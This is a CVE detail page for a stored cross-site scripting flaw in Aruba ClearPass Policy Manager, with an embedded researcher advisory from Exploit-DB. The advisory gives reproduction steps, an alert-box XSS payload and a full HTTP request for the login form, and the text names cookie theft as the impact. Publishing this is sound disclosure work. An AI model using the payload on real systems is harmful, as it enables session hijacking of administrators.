CVE-2015-1389 : Detail

CVE-2015-1389

Cross-site Scripting
A03-Injection
7.47%V4
Network
2015-05-28
12h00 +00:00
2016-12-29
17h57 +00:00
CVE.org
NVD
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Cross-site scripting (XSS) vulnerability in Aruba Networks ClearPass Policy Manager (CPPM) before 6.4.5 allows remote attackers to inject arbitrary web script or HTML via the username parameter to tips/tipsLoginSubmit.action.

CVE Informations

Related Weaknesses

CWE-ID Weakness Name Source
CWE-79 Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users.

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.3 AV:N/AC:M/Au:N/C:N/I:P/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
EPSS First.org

Exploit information

Exploit Database EDB-ID : 37172

Publication date : 2015-05-31 22h00 +00:00
Author : Cristiano Maruti
EDB Verified : No

=============================================================================== title: ClearPass Policy Manager Stored XSS case id: CM-2014-01 product: Aruba ClearPass Policy Manager vulnerability type: Stored cross-site script severity: Medium found: 2014-11-24 by: Cristiano Maruti (@cmaruti) =============================================================================== [EXECUTIVE SUMMARY] The analysis discovered a stored cross site scripting vulnerability (OWASP OTG-INPVAL-002) in the ClearPass Policy Manager. A malicious unauthenticated user is able to inject arbitrary script through the login form that may be rendered and triggered later if a privileged authenticated user reviews the access audit record. An attack can use the aforementioned vulnerability to effectively steal session cookies of privileged logged on users. [VULNERABLE VERSIONS] The following version of the Aruba ClearPass Policy Manager was affected by the vulnerability; previous versions may be vulnerable as well: - Aruba ClearPass Policy Manager 6.4 [TECHNICAL DETAILS] It is possible to reproduce the vulnerability following these steps: 1. Open the login page with your browser; 2. Put the "><img src=x onerror=alert(1337)><" string in the username field and fill in the password field with a value of your choice; 3. Submit the form; 4. Login to the application with an administrative user: 5. Go to "Monitoring -> Live monitoring -> Access tracker" to raise the payload. Below a full transcript of the HTTP request used to raise the vulnerability HTTP Request ------------------------------------------------------------------------------- POST /tips/tipsLoginSubmit.action HTTP/1.1 Host: 10.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Referer: https://10.0.0.1/tips/tipsLoginSubmit.action Cookie: <A VALID UNAUTH COOKIE> Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 58 username="><img src=x onerror=alert("0wn3d")><"&password=test ------------------------------------------------------------------------------- A copy of the report with technical details about the vulnerability I have identified is available at: https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf [VULNERABILITY REFERENCE] The following CVE ID was allocated to track the vulnerability: - CVE-2015-1389: Stored cross-site scripting (XSS) [DISCLOSURE TIMELINE] 2014-11-24 Vulnerability submitted to vendor through the Bugcrowd bounty program. 2014-12-09 Vendor acknowledged the problem. 2014-12-10 Researcher requested to publicly disclose the issue. 2015-02-16 Vendor released a fix for the reported issue. 2015-02-09 Vendor asked to hold-on for the public disclosure. 2015-02-22 Vendor postponed the public disclosure date 2015-02-22 Public coordinated disclosure. [SOLUTION] Aruba release an update to fix the vulnerability (ClearPass 6.5 or later). Please see the below link for further information released by the vendor: - http://www.arubanetworks.com/assets/alert/ARUBA-PSA-2015-006.txt [REPORT URL] https://github.com/cmaruti/reports/blob/master/aruba_clearpass.pdf

Products Mentioned

Configuraton 0

Arubanetworks>>Clearpass_policy_manager >> Version To (including) 6.4.4

References

https://www.exploit-db.com/exploits/37172/
Tags : exploit, x_refsource_EXPLOIT-DB
http://seclists.org/fulldisclosure/2015/May/115
Tags : mailing-list, x_refsource_FULLDISC